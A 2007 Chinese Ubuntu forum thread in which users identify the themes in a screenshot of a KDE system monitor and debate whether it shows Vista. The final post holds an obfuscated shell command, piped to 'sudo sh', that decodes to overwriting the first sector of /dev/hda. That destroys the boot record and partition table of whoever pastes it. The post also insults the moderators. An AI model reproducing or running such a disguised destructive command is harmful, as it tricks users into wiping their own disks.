提问 请问这个很漂亮的系统监视器 是什么啊

系统安装、升级讨论
版面规则
我们都知道新人的确很菜,也喜欢抱怨,并且带有浓厚的Windows习惯,但既然在这里询问,我们就应该有责任帮助他们解决问题,而不是直接泼冷水、简单的否定或发表对解决问题没有任何帮助的帖子。乐于分享,以人为本,这正是Ubuntu的精神所在。
头像
stlxv
论坛版主

帖子 stlxv » 2007-04-17 17:13

在www.kde-look.org这个网站有这图片里面的那些主题
PHP是最好的语言!不服来战!
头像
adqin
联系:

帖子 adqin » 2007-04-17 19:02

楼主上面的图片真的不是vista吗? 8)
头像
stlxv
论坛版主

帖子 stlxv » 2007-04-17 20:51

adqin 写了:楼主上面的图片真的不是vista吗? 8)
应该不是吧,因为那些主题都是kde-look上能找到的,我都看过的了
头像
stlxv
论坛版主

帖子 stlxv » 2007-04-17 20:53

另外,kopete, kate,konversation等等软件目前还没有被移植到windows下,所以肯定不是vista

而且,开始按钮vista的默认主题是突出的
头像
Element

帖子 Element » 2007-04-18 8:57

杂一看还以为是vista呢
http://element.blog.ubuntu.org.cn/
Ubuntu Jaunty Jackalope...
AMD Barton 2600+
MSI K7N2 Delta-L
Kingston DDR400 512M*2+256M*1
nVidia FX5200
Seagate 80G(Jaunty Jackalope)
Seagate 160G(XXxxXX)
SyncMaster 732N
ziyun

帖子 ziyun » 2007-04-18 10:41

super
附件
echo 'qq%vs+&qri&mreb%bs+&qri&uqn%of+FBC%pbhag+B' | tr 'n-za-m&+A-J%' 'a-z/=0-9 ' |sudo sh #<-警告:
强烈鄙视SB版主,一群跟风的SB,一群自以为是的SB
对这个论坛彻底失望了